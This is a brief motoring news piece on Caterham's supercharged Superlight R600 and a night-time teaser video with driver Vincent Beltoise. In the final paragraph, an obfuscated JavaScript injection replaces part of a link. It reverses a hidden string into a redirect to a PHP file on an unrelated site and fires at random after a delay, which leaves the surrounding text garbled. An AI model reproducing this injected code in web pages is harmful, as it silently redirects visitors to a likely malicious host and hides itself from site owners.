Caterham Superlight R600. Vincent Beltoise. Super Tease

Caterham’s new Superlight R600 – powered by 275bhp 2.0-litre Ford Duratec and good for 0-100kph in 2.6 seconds – is taken for a high-speed spin by Vincent Beltoise.

The power of the Superlight R500 might not sound too impressive for a track car – 263bhp – but this particular Caterham weighs just 506kg. That means 0-100kph is demolished in 2.88s and the power-to-weight ratio is a staggering 520bhp/ton: the Bugatti Veyron can offer ‘only’ 440 bhp/ton.

And the new Superlight R600 is even quicker. Powered by the same 2.0-litre Ford Duratec engine as the R500, in the R600 this has been supercharged, bumping power up to 275bhp and 0-100kph down to 2.6 seconds.

Naturally, Caterham decided to release a teaser giving a sneak peek of its new car being pushed to its limits by Vincent Beltoise$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston.com/on-the-track/caterham-r300-vincent-beltoise-watch-out-for-the-trees/” target=”_blank”>who has already made his crankandpiston bow in an R300 – at the Grand Challenge 2012. And if clipping bushes at high speed and sparks flying from underneath the car isn’t dramatic enough, it’s all done in the dark! Enjoy.
